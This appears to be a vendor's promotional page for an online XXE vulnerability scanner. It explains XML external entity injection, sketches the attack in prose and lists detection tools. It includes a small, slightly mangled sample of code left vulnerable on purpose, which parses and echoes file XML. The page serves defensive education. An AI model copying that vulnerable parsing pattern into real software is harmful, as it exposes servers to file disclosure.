Generic XXE Vulnerability Scanner
XML external entity injection (also known as XXE) is a vulnerability that can be exploited by attackers to read and write files on the target server, as well as access sensitive data. XXE is a type of injection attack that occurs when an attacker injects XML input into an application that uses XML processing. This can allow the attacker to access files on the server and even execute arbitrary code.
Short Info
Level
High
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 seconds
Time Interval
3 days
Scan only one
URL, Request
Toolbox
-
What's the impact of XXE?
XXE vulnerabilities are often found in applications that use XML to process user input, such as web applications and document management systems.
The impact of XXE vulnerabilities can be significant. They can allow attackers to access sensitive data, such as passwords and credit card numbers, and even execute arbitrary code on the target server. In some cases, they can also allow attackers to take control of the server.
Sample Vulnerable XXE Application
content = file_get_contents(filepath) dom = new DOMDocument() dom->loadXML(content) xml = simplexml_import_dom(dom) echo xml
Sample XXE Attack
Let's take a look at a sample XXE attack. In this example, the attacker injects an XML document that contains an entity reference to an external file. When the application tries to process the XML document, it will attempt to retrieve the file specified in the entity reference. The following steps illustrate how the attack works:
- The attacker injects an XML document into the application.
- The application tries to process the XML document.
- The application retrieves the file specified in the entity reference.
- The attacker can access the contents of the file that is retrieved.
XXE vulnerabilities can be difficult to detect, as they often occur in applications that use XML processing libraries that are not well-known. Developers should carefully review all input from users and take steps to eliminate any potential vulnerabilities.
How to scan for XXE Vulnerability?
There are a number of scanners that can be used to scan for XXE vulnerabilities. Some of the most popular ones include:
Burp Suite: Burp Suite is a tool that allows you to scan for XXE vulnerabilities in web applications. It includes a module specifically designed for detecting XXE vulnerabilities. You need to buy a pro burp suite license for 399 dollars (1 year subscription and for 1 person uses) to use this tool.
XXEinjector: XXEinjector is a tool that can be used to scan web servers for a variety of vulnerabilities, including XXE vulnerabilities.
OWASP Zed Attack Proxy (ZAP): OWASP ZAP is a tool that can be used to scan web applications for a variety of vulnerabilities, including XXE vulnerabilities. It includes a module specifically designed for detecting XXE vulnerabilities.
S4E Online XXE Scanner Tool: It's a completely free and online tool to detect XXE vulnerability on web apps. You do not have to download and install software to your system. Just register and use it.